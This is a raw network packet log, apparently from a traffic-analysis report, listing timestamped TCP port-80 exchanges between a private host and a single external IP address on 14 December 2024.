Dec 14, 2024 12:56:43.866518021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.867027044 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.867331982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.867587090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.868072987 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.868345976 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.868642092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.869183064 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.869816065 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.869849920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.869887114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.869971037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.870632887 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.870757103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.871265888 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.871680021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.871787071 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.871851921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.872200966 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.872838020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.872873068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.873074055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.873097897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.873914957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.873950005 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.873996973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.874840021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.874969959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.875025988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.875133038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.876137972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.876173019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.876221895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.876221895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.876863956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.876986980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.877146959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.877899885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.877952099 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.878070116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.878211975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.878943920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.879057884 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.879101038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.879414082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.879995108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.880049944 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.880171061 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.880260944 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.881087065 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.881207943 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.881257057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.881738901 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.882085085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.882188082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.882261038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.882359982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.883112907 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.883189917 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.883351088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.883497953 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.884203911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.884274960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.884511948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.884574890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.885180950 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.885282993 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.885350943 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.885422945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.886246920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.886363029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.886432886 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.886543036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.887386084 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.887523890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.887590885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.887676954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.888351917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.888459921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.888608932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.889439106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.889472961 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.889684916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.889684916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.890558958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.890593052 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.890665054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.890665054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.891433001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.891606092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.891673088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.891855955 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.892546892 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.892751932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.893382072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.893548965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.893682957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.893804073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.894608974 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.894643068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.894988060 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.895608902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.895725012 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.895795107 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.895922899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.896619081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.896687984 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.896745920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.897089005 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.897684097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.897901058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.898010969 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.898010969 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.898749113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.898854017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.898902893 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.898904085 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.899759054 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.899935007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.900413036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.900913954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.900949001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.901180029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.901180029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:43.901921034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:43.902281046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.039196014 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.039241076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.039330959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.039330959 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.039459944 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.039581060 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.039637089 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.039689064 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.040493011 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.040646076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.040683985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.040776014 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.041557074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.041745901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.041790962 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.041874886 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.042689085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.042881966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.042967081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.042967081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.043657064 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.043785095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.043804884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.043883085 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.044634104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.044815063 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.045150042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.045150042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.045773983 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.045886040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.045892000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.046427965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.046752930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.046895027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.047004938 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.047758102 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.047816038 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.047950029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.047950029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.048779964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.048907042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.049832106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.049917936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.049964905 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.050853968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.051021099 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.051112890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.051911116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.052020073 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.052938938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.053026915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.053061962 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.053988934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.054042101 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.054146051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.055042982 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.055172920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.055672884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.056082964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.056209087 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.057126045 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.057193995 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.057255983 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.058150053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.058413029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.058489084 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.059271097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.059344053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.059345007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.059637070 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.060216904 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.060328007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.060590029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.061250925 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.061367035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.061698914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.062309980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.062436104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.062753916 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.063366890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.063412905 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.063456059 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.063896894 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.064479113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.064688921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.064951897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.065454006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.065653086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.066495895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.066600084 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.067085028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.067568064 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.067683935 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.068181992 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.068633080 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.068633080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.068702936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.068747044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.068747044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.069628000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.069705963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.069731951 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.070177078 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.070676088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.070744038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.070821047 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.071347952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.071702957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.071790934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.071837902 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.071943045 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.072746038 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.072858095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.072915077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.073791027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.073919058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.073988914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.074317932 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.074793100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.074913025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.075023890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.075717926 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.075948000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.076082945 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.076086998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.076179981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.077002048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.077111006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.077152967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.077152967 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.077996969 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.078111887 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.078154087 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.078232050 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.078995943 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.079149008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.079302073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.079302073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.080090046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.080144882 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.080147028 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.080256939 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.081063986 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.081141949 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.081216097 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.082036972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.082166910 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.083077908 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.083165884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.083204985 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.083688021 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.084156036 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.084256887 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.085172892 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.085232973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.085297108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.086247921 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.086302042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.086388111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.087426901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.087465048 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.087690115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.088335991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.088463068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.089332104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.089404106 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.089467049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.090413094 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.090473890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.090492010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.091394901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.091450930 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.091511965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.091869116 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.093413115 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.093447924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.093502998 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.093638897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.231774092 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.231883049 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.232124090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.232150078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.232168913 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.232258081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.232258081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.232702971 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.232826948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.232975006 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.232975960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.233728886 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.233858109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.233993053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.234781027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.234899044 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.234916925 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.235039949 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.235862017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.235980988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.236848116 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.236912966 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.236955881 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.237066984 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.237879992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.237972975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.238002062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.238116980 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.238915920 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.239003897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.239018917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.239176989 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.239969015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.240057945 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.241014004 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.241120100 CET	49860	80	192.168.2.4	31.41.244.11
